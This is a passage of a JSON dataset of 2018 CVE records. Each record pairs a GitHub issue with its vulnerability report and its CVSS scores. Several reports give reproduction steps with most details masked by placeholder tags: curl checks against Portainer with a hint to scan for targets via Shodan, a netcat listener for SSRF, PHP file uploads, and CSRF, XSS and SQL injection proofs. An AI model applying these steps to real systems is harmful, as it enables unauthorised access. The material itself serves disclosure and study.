  28397. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2186",
  28398. "Repo_new": "fasterxml/jackson-databind",
  28399. "Issue_Created_At": "2018-11-18T23:39:02Z",
  28400. "description": "Block more classes from polymorphic deserialization (placeholder). This is placeholder issue for fixes for as of yet unpublished CVEs, ids to be allocated. Once fix verified, included in NUMBERTAG branch, will be updated with actual ids.",
  28401. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  28402. "severity": "CRITICAL",
  28403. "baseScore": 9.8,
  28404. "impactScore": 5.9,
  28405. "exploitabilityScore": 3.9
  28406. },
  28407. {
  28408. "CVE_ID": "CVE-2018-19367",
  28409. "Issue_Url_old": "https://github.com/portainer/portainer/issues/2475",
  28410. "Issue_Url_new": "https://github.com/portainer/portainer/issues/2475",
  28411. "Repo_new": "portainer/portainer",
  28412. "Issue_Created_At": "2018-11-19T22:51:53Z",
  28413. "description": "Responsible Disclosure Check if admin already created by a public API endpoint. Portainer Check if admin already created by a public API endpoint PRODUCT DESCRIPTION FILETAG IS AN OPEN SOURCE LIGHTWEIGHT MANAGEMENT UI WHICH ALLOWS YOU TO EASILY MANAGE YOUR DOCKER HOSTS OR SWARM CLUSTERS BACKGROUND Portainer until NUMBERTAG ULNERABILITY DETAILS Portainer provides an API endpoint ( PATHTAG ) to verify that the admin user is already created. This API endpoint will return ERRORTAG if admin was not created and NUMBERTAG if it was already created. This \"feature\" allows anyone to receive unauthorized access on the host when the portainer is configured incorrectly. PROOF OF CONCEPT Manual steps to reproduce the vulnerability NUMBERTAG docker run rm it p NUMBERTAG PATHTAG portainer/portainer NUMBERTAG curl X GET s o /dev/null w \"%{http_code}\" URLTAG NUMBERTAG If curl return ERRORTAG , open web browser and create a admin password. xdg open URLTAG Applying this around the world with shodan: CODETAG If you has a paid plan, you can use a filters: ERRORTAG Output example: ERRORTAG WORKAROUND Forcing the admin password by extra parameter on portainer CLI FILETAG admin password URLTAG . On source code portainer.go L NUMBERTAG L NUMBERTAG URLTAG . VULNERABILITY DISCLOSURE TIMELINE NUMBERTAG endor was contacted AUTHOR & REVISION Author: Gustavo Lichti <gustavo. EMAILTAG > Revision: More info: shodan portainer URLTAG",
  28414. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  28415. "severity": "CRITICAL",
  28416. "baseScore": 9.8,
  28417. "impactScore": 5.9,
  28418. "exploitabilityScore": 3.9
  28419. },
  28420. {
  28421. "CVE_ID": "CVE-2018-19376",
  28422. "Issue_Url_old": "https://github.com/GreenCMS/GreenCMS/issues/114",
  28423. "Issue_Url_new": "https://github.com/greencms/greencms/issues/114",
  28424. "Repo_new": "greencms/greencms",
  28425. "Issue_Created_At": "2018-11-20T17:04:18Z",
  28426. "description": "There is a csrf vulnerability that once click a url which include payload can delete webserver log. when an authenticated administrator clicks a url which includes payload, then the webserver log will be deleted poc: APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  28427. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  28428. "severity": "MEDIUM",
  28429. "baseScore": 6.5,
  28430. "impactScore": 3.6,
  28431. "exploitabilityScore": 2.8
  28432. },
  28433. {
  28434. "CVE_ID": "CVE-2018-19417",
  28435. "Issue_Url_old": "https://github.com/contiki-ng/contiki-ng/issues/600",
  28436. "Issue_Url_new": "https://github.com/contiki-ng/contiki-ng/issues/600",
  28437. "Repo_new": "contiki-ng/contiki-ng",
  28438. "Issue_Created_At": "2018-07-11T12:21:53Z",
  28439. "description": "Stack based buffer overflow while parsing MQTT messages (parsing PUBLISH message with variable length header). Function APITAG that parses MQTT PUBLISH messages with variable length header (see details in: URLTAG tries to memcpy input data into fixed size buffer. Allocated buffer can fit only MQTT_MAX_TOPIC_LENGTH NUMBERTAG bytes and the length check is missing. Declaration of buffer: PATHTAG struct mqtt_message { uint NUMBERTAG t mid; char topic[MQTT_MAX_TOPIC_LENGTH NUMBERTAG for string termination / PATHTAG define MQTT_MAX_TOPIC_LENGTH NUMBERTAG Overflow: PATHTAG memcpy(&conn APITAG APITAG &input_data_ptr[ pos], copy_bytes); This could lead to Remote Code Execution via stack smashing attack (overwriting the function return address). Proposed CVSS score: PATHTAG NUMBERTAG Critical) Mitigation : The size of data copied to topic buffer should be limited to MQTT_MAX_TOPIC_LENGTH. Crash details using Address Sanitizer (line number could not match to original sources): APITAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG fff NUMBERTAG a NUMBERTAG a0 at pc NUMBERTAG fe2a1b NUMBERTAG bp NUMBERTAG fff NUMBERTAG a NUMBERTAG sp NUMBERTAG fff NUMBERTAG a NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG fff NUMBERTAG a NUMBERTAG a0 thread T NUMBERTAG fe2a1b NUMBERTAG in __asan_memcpy ( PATHTAG NUMBERTAG d NUMBERTAG in parse_publish_vhdr PATHTAG NUMBERTAG d NUMBERTAG in tcp_input PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG fe2a NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG ) Address NUMBERTAG fff NUMBERTAG a NUMBERTAG a0 is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG ef in main PATHTAG This frame has NUMBERTAG object(s NUMBERTAG conn' APITAG NUMBERTAG e NUMBERTAG c NUMBERTAG f3]f3 f3 f3 f3 f3 f3 f NUMBERTAG e NUMBERTAG c NUMBERTAG e NUMBERTAG c NUMBERTAG e NUMBERTAG c NUMBERTAG e NUMBERTAG c NUMBERTAG e NUMBERTAG c NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG 
application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING Crash details from exploitable gdb plugin: CRASH SUMMARY Filename: PATHTAG SHA1: APITAG Classification: EXPLOITABLE Hash: APITAG Command: FILETAG PATHTAG Faulting Frame: None NUMBERTAG ffff NUMBERTAG in ? Disassembly: Stack Head NUMBERTAG entries): None NUMBERTAG ffff NUMBERTAG in ? None NUMBERTAG in ? Registers: ra NUMBERTAG rb NUMBERTAG a8d NUMBERTAG rc NUMBERTAG rd NUMBERTAG rsi NUMBERTAG rdi NUMBERTAG ffff7dd1b NUMBERTAG rbp NUMBERTAG d NUMBERTAG rsp NUMBERTAG fffffffd7d0 r NUMBERTAG e NUMBERTAG r NUMBERTAG r NUMBERTAG b8 r NUMBERTAG ffff7a NUMBERTAG f0 r NUMBERTAG cc0 r NUMBERTAG fffffffd8a0 r NUMBERTAG ff NUMBERTAG r NUMBERTAG rip NUMBERTAG ffff NUMBERTAG efl NUMBERTAG cs NUMBERTAG ss NUMBERTAG b ds NUMBERTAG es NUMBERTAG fs NUMBERTAG gs NUMBERTAG Extra Data: Description: Segmentation fault on program counter Short description: APITAG NUMBERTAG Explanation: The target tried to access data at an address that matches the program counter. This is likely due to the execution of a branch instruction (ex: 'call') with a bad argument, but it could also be due to execution continuing past the end of a memory region or another cause. Regardless this likely indicates that the program counter contents are tainted and can be controlled by an attacker. END SUMMARY",
  28440. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  28441. "severity": "CRITICAL",
  28442. "baseScore": 10.0,
  28443. "impactScore": 6.0,
  28444. "exploitabilityScore": 3.9
  28445. },
  28446. {
  28447. "CVE_ID": "CVE-2018-19420",
  28448. "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1301",
  28449. "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1301",
  28450. "Repo_new": "getsimplecms/getsimplecms",
  28451. "Issue_Created_At": "2018-11-14T20:30:24Z",
  28452. "description": "APITAG allowed to some files that are able to execute HTML. Brief of this vulnerability APITAG allowed to upload the files that are able to execute HTML files. There are NUMBERTAG types of HTML executable files. HTML File with no extension HTML File with uncommon extension ( e.g. asdf) HTML encoded as EML ( Triggered in IE only ) (I also confirmed about SVG issue, but there was the issue already NUMBERTAG Test Environment APITAG APITAG PHP NUMBERTAG APITAG (cli) Affect version NUMBERTAG Payload move to APITAG with admin credential Upload prepared malformed files. HTML File with no extension Filename test APITAG HTML File with uncommon extension Filename APITAG APITAG HTML File encoded as EML Filename test.eml APITAG NUMBERTAG Click the uploaded file name or move to APITAG NUMBERTAG Profit! Reason of This Vulnerability In APITAG , Third parameter of APITAG is not exist. Function APITAG is in APITAG and Third parameter, mime , will be null. As a result, the file filtering of APITAG depend on extensions. ( Not use MIME Type ) It can allows to upload the three type files that I introduced.",
  28453. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N",
  28454. "severity": "LOW",
  28455. "baseScore": 3.8,
  28456. "impactScore": 2.5,
  28457. "exploitabilityScore": 1.2
  28458. },
  28459. {
  28460. "CVE_ID": "CVE-2018-19422",
  28461. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/801",
  28462. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/801",
  28463. "Repo_new": "intelliants/subrion",
  28464. "Issue_Created_At": "2018-11-14T19:18:24Z",
  28465. "description": "Subrion allows to upload pht, phar extensions.. Brief of this vulnerability In uploading process, Subrion allows to upload pht, phar files. There are able to execute as PHP script following server environment. Test Environment APITAG APITAG PHP NUMBERTAG APITAG (cli) Affect version NUMBERTAG Payload NUMBERTAG move to APITAG with admin credential NUMBERTAG Save php codes with pht or phar extensions. and upload it like below. APITAG NUMBERTAG Right Click and Open the uploaded file name or move to APITAG NUMBERTAG Profit! Reason of This Vulnerability Subrion has APITAG file for preventing execution of uploaded file. CODETAG In upload directory, APITAG did not prevent execution of the files that have the pht and phar extensions. As a result, they are able to execute as PHP script. I tested the pht extensions because my test environment is PHP NUMBERTAG so APITAG can not execute phar extension scripts as PHP. But If Subrion installed in PHP NUMBERTAG envrionment, phar extension is also able to execute as PHP.",
  28466. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  28467. "severity": "HIGH",
  28468. "baseScore": 7.2,
  28469. "impactScore": 5.9,
  28470. "exploitabilityScore": 1.2
  28471. },
  28472. {
  28473. "CVE_ID": "CVE-2018-19432",
  28474. "Issue_Url_old": "https://github.com/erikd/libsndfile/issues/427",
  28475. "Issue_Url_new": "https://github.com/libsndfile/libsndfile/issues/427",
  28476. "Repo_new": "libsndfile/libsndfile",
  28477. "Issue_Created_At": "2018-11-22T03:19:43Z",
  28478. "description": "out of bounds read in sf_write_int. version libsndfile: Version released NUMBERTAG description An issue was discovered in libsndfile NUMBERTAG There is an out of bounds read at function sf_write_int, will lead to a denial of service or the others. ERRORTAG debug info In function deinterleave_int, 'ch' is NUMBERTAG leads to the array bounds, and then crash in function sf_write_int . ERRORTAG FILETAG others this bug is reported by pwd MENTIONTAG please send email to EMAILTAG if you have some question.",
  28479. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  28480. "severity": "MEDIUM",
  28481. "baseScore": 6.5,
  28482. "impactScore": 3.6,
  28483. "exploitabilityScore": 2.8
  28484. },
  28485. {
  28486. "CVE_ID": "CVE-2018-19433",
  28487. "Issue_Url_old": "https://github.com/star7th/showdoc/issues/392",
  28488. "Issue_Url_new": "https://github.com/star7th/showdoc/issues/392",
  28489. "Repo_new": "star7th/showdoc",
  28490. "Issue_Created_At": "2018-11-22T03:48:25Z",
  28491. "description": "There is a XSS. In the FILETAG line NUMBERTAG APITAG APITAG accept the parameter from the APITAG ,then in the line NUMBERTAG APITAG put the parameter directly in the html i reproduce the attack in the docker. after set up the docker, just open the url: URLTAG then: APITAG the source code: FILETAG remove APITAG if you want to reproduce it again",
  28492. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  28493. "severity": "MEDIUM",
  28494. "baseScore": 6.1,
  28495. "impactScore": 2.7,
  28496. "exploitabilityScore": 2.8
  28497. },
  28498. {
  28499. "CVE_ID": "CVE-2018-19469",
  28500. "Issue_Url_old": "https://github.com/woider/ArticleCMS/issues/5",
  28501. "Issue_Url_new": "https://github.com/woider/articlecms/issues/5",
  28502. "Repo_new": "woider/articlecms",
  28503. "Issue_Created_At": "2018-11-22T09:41:27Z",
  28504. "description": "In the modified name XSS attacks with the location of the mailbox. POC\uff1a ERRORTAG location\uff1a ERRORTAG",
  28505. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  28506. "severity": "MEDIUM",
  28507. "baseScore": 6.1,
  28508. "impactScore": 2.7,
  28509. "exploitabilityScore": 2.8
  28510. },
  28511. {
  28512. "CVE_ID": "CVE-2018-19517",
  28513. "Issue_Url_old": "https://github.com/sysstat/sysstat/issues/199",
  28514. "Issue_Url_new": "https://github.com/sysstat/sysstat/issues/199",
  28515. "Repo_new": "sysstat/sysstat",
  28516. "Issue_Created_At": "2018-11-23T08:36:20Z",
  28517. "description": "bug report]: out of bound read in sadf which leads to crash.. Version APITAG Description The remap_struct function in APITAG NUMBERTAG has an out of bounds read during a memset call, as demonstrated by sadf. Related APITAG ERRORTAG Additional Information As the debug info shows, the args of memset points to an invalid address. ERRORTAG ASAN ERRORTAG [poc here URLTAG",
  28518. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  28519. "severity": "MEDIUM",
  28520. "baseScore": 5.5,
  28521. "impactScore": 3.6,
  28522. "exploitabilityScore": 1.8
  28523. },
  28524. {
  28525. "CVE_ID": "CVE-2018-19530",
  28526. "Issue_Url_old": "https://github.com/httl/httl/issues/225",
  28527. "Issue_Url_new": "https://github.com/httl/httl/issues/225",
  28528. "Repo_new": "httl/httl",
  28529. "Issue_Created_At": "2018-11-19T05:58:57Z",
  28530. "description": "decodexml \u914d\u7f6exstream.",
  28531. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  28532. "severity": "CRITICAL",
  28533. "baseScore": 9.8,
  28534. "impactScore": 5.9,
  28535. "exploitabilityScore": 3.9
  28536. },
  28537. {
  28538. "CVE_ID": "CVE-2018-19531",
  28539. "Issue_Url_old": "https://github.com/httl/httl/issues/224",
  28540. "Issue_Url_new": "https://github.com/httl/httl/issues/224",
  28541. "Repo_new": "httl/httl",
  28542. "Issue_Created_At": "2018-11-19T05:51:53Z",
  28543. "description": "APITAG \u51fd\u6570\u5b58\u5728\u5b89\u5168\u95ee\u9898. APITAG APITAG set(xml2=' APITAG APITAG APITAG APITAG APITAG APITAG calc APITAG APITAG APITAG APITAG APITAG APITAG ') APITAG APITAG APITAG set(xml1=' APITAG APITAG APITAG APITAG NUMBERTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG false APITAG APITAG NUMBERTAG APITAG APITAG APITAG APITAG APITAG APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG start APITAG APITAG APITAG APITAG foo APITAG APITAG APITAG foo APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG false APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG false APITAG APITAG APITAG false APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG ') APITAG",
  28544. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  28545. "severity": "CRITICAL",
  28546. "baseScore": 9.8,
  28547. "impactScore": 5.9,
  28548. "exploitabilityScore": 3.9
  28549. },
  28550. {
  28551. "CVE_ID": "CVE-2018-19535",
  28552. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/428",
  28553. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/428",
  28554. "Repo_new": "exiv2/exiv2",
  28555. "Issue_Created_At": "2018-09-01T05:40:24Z",
  28556. "description": "APITAG heap buffer overflow at APITAG When running APITAG NUMBERTAG c6f) against png files, , ASAN reports a heap buffer overflow error. POCs: FILETAG FILETAG ASAN output: ERRORTAG",
  28557. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  28558. "severity": "MEDIUM",
  28559. "baseScore": 6.5,
  28560. "impactScore": 3.6,
  28561. "exploitabilityScore": 2.8
  28562. },
  28563. {
  28564. "CVE_ID": "CVE-2018-19539",
  28565. "Issue_Url_old": "https://github.com/mdadams/jasper/issues/182",
  28566. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/182",
  28567. "Repo_new": "jasper-software/jasper",
  28568. "Issue_Created_At": "2018-07-13T05:02:09Z",
  28569. "description": "NUMBERTAG bugs found by APITAG (heap buffer overflows, Null pointer dereference and assertion failures). Hi all, These bugs were found with APITAG an input structure aware extension of AFL. Thanks also to Marcel B\u00f6hme, Andrew Santosa and Alexandru Razvan Caciulescu. These bugs were found on Ubuntu NUMBERTAG bit Jasper revision NUMBERTAG a6e4 (HEAD) To reproduce: jasper input APITAG .jp2 input format jp2 output /dev/null output format bmp Bug triggering files are attached. Bug NUMBERTAG Heap Buffer Overflow Read of size NUMBERTAG APITAG ASAN says: APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG e9c8 at pc NUMBERTAG f NUMBERTAG adebb NUMBERTAG bp NUMBERTAG ffefa1c9e NUMBERTAG sp NUMBERTAG ffefa1c9e NUMBERTAG READ of size NUMBERTAG at NUMBERTAG e9c8 thread T NUMBERTAG f NUMBERTAG adebb NUMBERTAG in jas_image_depalettize PATHTAG NUMBERTAG f NUMBERTAG ae0e0ee in jp2_decode PATHTAG NUMBERTAG f NUMBERTAG ade NUMBERTAG c in jas_image_decode PATHTAG NUMBERTAG c in main PATHTAG NUMBERTAG f NUMBERTAG aa NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG e9c8 is located NUMBERTAG bytes to the left of NUMBERTAG byte region FILETAG",
  28570. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  28571. "severity": "MEDIUM",
  28572. "baseScore": 6.5,
  28573. "impactScore": 3.6,
  28574. "exploitabilityScore": 2.8
  28575. },
  28576. {
  28577. "CVE_ID": "CVE-2018-19548",
  28578. "Issue_Url_old": "https://github.com/EduSec/EduSec/issues/14",
  28579. "Issue_Url_new": "https://github.com/edusec/edusec/issues/14",
  28580. "Repo_new": "EduSec/EduSec",
  28581. "Issue_Created_At": "2018-11-23T07:13:38Z",
  28582. "description": "User login security issues. Login interface APITAG APITAG can use a password mechanism that does not prevent brute force cracking, and can use brute force cracking tools to iterate over user names and passwords. Methods: burpsuite pro was used to grab the login packet of the user and then send it to the intruder function to violently guess the user name and password. FILETAG FILETAG FILETAG Solution: you can use a captcha mechanism, or you can use an account or limit the number of times an account name and password error can be checked",
  28583. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  28584. "severity": "CRITICAL",
  28585. "baseScore": 9.8,
  28586. "impactScore": 5.9,
  28587. "exploitabilityScore": 3.9
  28588. },
  28589. {
  28590. "CVE_ID": "CVE-2018-19557",
  28591. "Issue_Url_old": "https://github.com/assnr/arcms/issues/1",
  28592. "Issue_Url_new": "https://github.com/assnr/arcms/issues/1",
  28593. "Repo_new": "assnr/arcms",
  28594. "Issue_Created_At": "2018-11-23T07:37:34Z",
  28595. "description": "APITAG Access and SQL Injection. Hello, when I browsed the code of arcms, I was surprised it didn't set permission for admin' APITAG can visit the URL below and make some operation on demo website NUMBERTAG URLTAG NUMBERTAG URLTAG NUMBERTAG URLTAG NUMBERTAG etc Then, I found a SQL injection in PATHTAG ERRORTAG Look at FILETAG",
  28596. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  28597. "severity": "CRITICAL",
  28598. "baseScore": 9.8,
  28599. "impactScore": 5.9,
  28600. "exploitabilityScore": 3.9
  28601. },
  28602. {
  28603. "CVE_ID": "CVE-2018-19559",
  28604. "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/5",
  28605. "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/5",
  28606. "Repo_new": "cuppacms/cuppacms",
  28607. "Issue_Created_At": "2018-11-08T09:18:03Z",
  28608. "description": "APITAG has SQL injection vulnerability. Affected software: APITAG Type of vulnerability: SQL injection Discovered by: darkrerror SQL Injection in PATHTAG with parameter reference_id function APITAG if(! APITAG FILETAG sqlmap tool screenshot FILETAG",
  28609. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  28610. "severity": "CRITICAL",
  28611. "baseScore": 9.8,
  28612. "impactScore": 5.9,
  28613. "exploitabilityScore": 3.9
  28614. },
  28615. {
  28616. "CVE_ID": "CVE-2018-19560",
  28617. "Issue_Url_old": "https://github.com/bagesoft/bagecms/issues/4",
  28618. "Issue_Url_new": "https://github.com/bagesoft/bagecms/issues/4",
  28619. "Repo_new": "bagesoft/bagecms",
  28620. "Issue_Created_At": "2018-11-09T02:02:41Z",
  28621. "description": "There is a CSRF vulnerability that can be used to modify administrator accounts to get system privileges.. When the administrator lands, open it. APITAG APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  28622. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  28623. "severity": "HIGH",
  28624. "baseScore": 8.8,
  28625. "impactScore": 5.9,
  28626. "exploitabilityScore": 2.8
  28627. },
  28628. {
  28629. "CVE_ID": "CVE-2018-19561",
  28630. "Issue_Url_old": "https://github.com/chenfeizhou/sikcms-v1.1/issues/1",
  28631. "Issue_Url_new": "https://github.com/chenfeizhou/sikcms-v1.1/issues/1",
  28632. "Repo_new": "chenfeizhou/sikcms-v1.1",
  28633. "Issue_Created_At": "2018-11-09T09:18:42Z",
  28634. "description": "CSRF vulnerability can be added to administrator account.. When the administrator lands, open it. APITAG APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  28635. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  28636. "severity": "HIGH",
  28637. "baseScore": 8.8,
  28638. "impactScore": 5.9,
  28639. "exploitabilityScore": 2.8
  28640. },
  28641. {
  28642. "CVE_ID": "CVE-2018-19599",
  28643. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/467",
  28644. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/467",
  28645. "Repo_new": "monstra-cms/monstra",
  28646. "Issue_Created_At": "2020-05-25T03:57:37Z",
  28647. "description": "Cross Site Scripting Vulnerability on APITAG upload file SVG in Monstra NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG feature. Monstra application allows the upload of a SVG file extension (which is also an image type). Reproduce Steps to reproduce the behavior NUMBERTAG Login into the panel Monstra NUMBERTAG Go to PATHTAG NUMBERTAG Upload file APITAG APITAG NUMBERTAG Open file upload : PATHTAG NUMBERTAG iew the preview to trigger XSS NUMBERTAG iew the preview to get in request and such Stored XSS. Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Screenshots FILETAG Desktop (please complete the following information): OS: Kali Browser: Firefox Version of Browser NUMBERTAG",
  28648. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  28649. "severity": "MEDIUM",
  28650. "baseScore": 5.4,
  28651. "impactScore": 2.7,
  28652. "exploitabilityScore": 2.3
  28653. },
  28654. {
  28655. "CVE_ID": "CVE-2018-19600",
  28656. "Issue_Url_old": "https://github.com/rhymix/rhymix/issues/1088",
  28657. "Issue_Url_new": "https://github.com/rhymix/rhymix/issues/1088",
  28658. "Repo_new": "rhymix/rhymix",
  28659. "Issue_Created_At": "2018-09-16T08:51:31Z",
  28660. "description": "XSS via SVG file upload in Rhymix CMS NUMBERTAG Affected software: Rhymix CMS NUMBERTAG Type of vulnerability: XSS via SVG file upload. Description: Rhymix CMS is prone to a Persistent Cross Site Scripting attack that allows a malicious user to inject HTML or scripts that can access any cookies, session tokens, or other sensitive information retained by your browser and used with that site. Remediation: Your script should properly sanitize user input. URLTAG Here is the crafted code for XSS. save this code as SVG file i.e. APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Steps to reproduce the vulnerability NUMBERTAG login site as admin NUMBERTAG Open URL URLTAG NUMBERTAG Upload SVG file with crafted XSS code APITAG image APITAG FILETAG NUMBERTAG Open uploaded the file to execute XSS payload APITAG image APITAG FILETAG Discovered by: Provensec Website: FILETAG Author: Subodh Kumar",
  28661. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  28662. "severity": "MEDIUM",
  28663. "baseScore": 4.8,
  28664. "impactScore": 2.7,
  28665. "exploitabilityScore": 1.7
  28666. },
  28667. {
  28668. "CVE_ID": "CVE-2018-19601",
  28669. "Issue_Url_old": "https://github.com/rhymix/rhymix/issues/1089",
  28670. "Issue_Url_new": "https://github.com/rhymix/rhymix/issues/1089",
  28671. "Repo_new": "rhymix/rhymix",
  28672. "Issue_Created_At": "2018-09-16T08:56:44Z",
  28673. "description": "SSRF via SVG file upload in Rhymix CMS NUMBERTAG Affected software: Rhymix CMS NUMBERTAG Type of vulnerability: SSRF via SVG file upload. Description: Discovered by: Provensec Website: FILETAG Author: Subodh Kumar Description: SSRF as in Server Side Request Forgery is a vulnerability that allows an attacker to force server interfaces into sending packets initiated by the victim server to the local interface or to another server behind the firewall. Consult Web References for more information about this problem. Impact on the server: Abuse the trust relationship between the vulnerable server and others. Bypass IP whitelisting. Bypass host based authentication services. Read resources which are not accessible to the public, such as trace.axd in ASP.NET or metadata APIs in an AWS environment. Scan the internal network to which the server is connected to. Read files from the web server. View Status Pages and interact with APIs as the web server. Retrieve sensitive information such as the IP address of a web server behind a reverse proxy. Remediation: Your script should properly sanitize user input. URLTAG Here is the crafted code for SSRF. Save this code as .svg file i.e. SSRF.svg APITAG APITAG APITAG APITAG Steps to reproduce the vulnerability NUMBERTAG login site as admin NUMBERTAG Open URL URLTAG NUMBERTAG Upload SVG file with crafted SSRF code APITAG image APITAG FILETAG NUMBERTAG Start netcat listener using the command \"nc nvlp NUMBERTAG APITAG image APITAG FILETAG NUMBERTAG Open uploaded the file NUMBERTAG Check netcat listener APITAG image APITAG FILETAG",
  28674. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
  28675. "severity": "CRITICAL",
  28676. "baseScore": 9.1,
  28677. "impactScore": 6.0,
  28678. "exploitabilityScore": 2.3
  28679. },
  28680. {
  28681. "CVE_ID": "CVE-2018-19607",
  28682. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/561",
  28683. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/561",
  28684. "Repo_new": "exiv2/exiv2",
  28685. "Issue_Created_At": "2018-11-23T14:14:35Z",
  28686. "description": "SEGV in APITAG at APITAG Tested in ubuntu NUMBERTAG bit, exi NUMBERTAG master dee NUMBERTAG a NUMBERTAG RC2) APITAG POC file URLTAG gdb info: ERRORTAG ASAN info: ERRORTAG Addition: This bug was found with mem AFL, which is based on AFL. Mem AFL is developed by Yanhao( EMAILTAG ) & Marsman NUMBERTAG EMAILTAG )",
  28687. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  28688. "severity": "MEDIUM",
  28689. "baseScore": 6.5,
  28690. "impactScore": 3.6,
  28691. "exploitabilityScore": 2.8
  28692. },
  28693. {
  28694. "CVE_ID": "CVE-2018-19620",
  28695. "Issue_Url_old": "https://github.com/star7th/showdoc/issues/397",
  28696. "Issue_Url_new": "https://github.com/star7th/showdoc/issues/397",
  28697. "Repo_new": "star7th/showdoc",
  28698. "Issue_Created_At": "2018-11-28T01:21:42Z",
  28699. "description": "Incorrect Access Control. Hello, A bug in the project. I think I should contact you through your APITAG; check your gmail later, Thank you.",
  28700. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
  28701. "severity": "MEDIUM",
  28702. "baseScore": 4.3,
  28703. "impactScore": 1.4,
  28704. "exploitabilityScore": 2.8
  28705. },
  28706. {
  28707. "CVE_ID": "CVE-2018-19661",
  28708. "Issue_Url_old": "https://github.com/erikd/libsndfile/issues/429",
  28709. "Issue_Url_new": "https://github.com/libsndfile/libsndfile/issues/429",
  28710. "Repo_new": "libsndfile/libsndfile",
  28711. "Issue_Created_At": "2018-11-27T08:57:34Z",
